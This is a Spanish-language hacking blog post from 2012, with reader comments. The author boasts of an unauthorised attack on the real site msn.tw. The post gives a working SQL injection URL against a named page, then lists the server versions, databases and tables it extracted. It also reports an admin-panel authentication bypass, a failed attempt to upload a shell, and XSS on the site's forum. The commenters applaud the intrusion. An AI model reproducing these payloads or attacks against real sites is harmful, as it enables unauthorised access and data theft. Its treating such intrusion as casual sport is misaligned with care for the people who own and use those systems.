MSN Taiwan [SQLI , BYPASS y XSS]

Tecleado por Maztor On 23:58
Bueno, por hay con un bro de ddlr nos pusimos a intentar el ingreso a MSN.TW de la cual es ironico que tenga un directorio tan mugre y a la vez usando PHP y MYSQL , sin embargo decidimos explorar mas debido a que es muy llamativo todo este escenario.
Msn.tw

Iniciamos asi:
http://www.msn.tw/softball/gamedetail.php?gameseq=218+and+1=0+union+select+version%28%29,1,2,3,4,5,6,7,8,9,10,11--

De hay comenzamos a sacar la data...
Info basica

Apache
PHP/5.2.13
PleskLin
MySQL >=5
5.0.90

Dbs's:

information_schema
msn
test

Db Principal:

accesslog
album
board
forum
game
lotto_539
mem
open_account
open_article
open_article_content
open_article_content_d
open_board
open_collect
open_keyword
open_tracking
open_violate
photo
record
record_2005
record_2006
record_2007
record_2009
record_2010
record_2011
record_2012
redir_conf
reserve
static
static_2005
static_2006
static_2007
static_2009
static_2010
static_2011
static_2012
team
user
webcont
-----------------------------------------------------------------------------------
Despues de realizar todo esto dieron ganas de subir shell, pero no logre el objetivo, intente en paneles loguearme y logre pero nada interesante aunqu cabe aclarar que no era necesario sacar user debido a que el panel tenia bypasse.. el Uploader no servia de mucho que digamos.
PANEL CON BYPASSE

Aburrido solo me puse a explotar XSS en el foro...
http://www.msn.tw/softball/forum.php

Apoyo ---------------------------------
Black-Mantic Blaron , 5TU4RT

8 Responses to 'MSN Taiwan [SQLI , BYPASS y XSS]'

  1. Nx0 said...
    http://www.maztor.com/2012/05/msn-taiwan-sqli-bypass-y-xss.html?showComment=1338016385436#c2841013439926707237'> 26 de mayo de 2012, 0:13

    ...Buen Apore!
    Aunsiquiera Lograstes La Info de La BD y XSS

     

  2. Anónimo said...
    http://www.maztor.com/2012/05/msn-taiwan-sqli-bypass-y-xss.html?showComment=1338016748286#c2239445856778124279'> 26 de mayo de 2012, 0:19

    Dando plomo a plenas 2:00 am, Entretenido, pero sigo pensando en que hay que aprender mandarin xD

    Buen Trabajo Maztor...


    SAlu2.
    5TU4RT

     

  3. lug said...
    http://www.maztor.com/2012/05/msn-taiwan-sqli-bypass-y-xss.html?showComment=1338016822925#c3727479905041543441'> 26 de mayo de 2012, 0:20

    bn man!, pero som como descuidaditos por aya, pensaria uno que siendo una web de microsoft se cuidarian mas de estas cosas

     

  4. Maztor said...
    http://www.maztor.com/2012/05/msn-taiwan-sqli-bypass-y-xss.html?showComment=1338016884107#c2483634032430426625'> 26 de mayo de 2012, 0:21

    @5TU4RT jajaja para la proxima nos ponemos a aprender esos idiomas en garabatos XD asi nos va mejor

     

  5. xDarkSton3x said...
    http://www.maztor.com/2012/05/msn-taiwan-sqli-bypass-y-xss.html?showComment=1338017277026#c230423725394622831'> 26 de mayo de 2012, 0:27

    Como siempre excelente entrada... ! Lastima que no se haya podido subir shell hubiera sidointeresante. Saludos Brothersin

    Por cierto seria bueno que tu xss lo mndaras a xssed.

     

  6. Maztor said...
    http://www.maztor.com/2012/05/msn-taiwan-sqli-bypass-y-xss.html?showComment=1338017706745#c5914383533811630106'> 26 de mayo de 2012, 0:35

    @xDarkSton3x No me acordaba, hay lo publico!

     

  7. M4ku4z^^ said...
    http://www.maztor.com/2012/05/msn-taiwan-sqli-bypass-y-xss.html?showComment=1338040508676#c7530101700704787339'> 26 de mayo de 2012, 6:55

    bien , muy rifado hermano , saudos desde mx

     

  8. Blaron said...
    http://www.maztor.com/2012/05/msn-taiwan-sqli-bypass-y-xss.html?showComment=1338151936300#c29333452956923913'> 27 de mayo de 2012, 13:52

    Ya sabes :P a seguir trasteando

     

Publicar un comentario en la entrada

Related Posts Plugin for WordPress, Blogger...
Sigueme en Twitter

Qr-c0de Url Blog

Suscribirse al blog

Ingresar Email

¡Recomendar! y RSS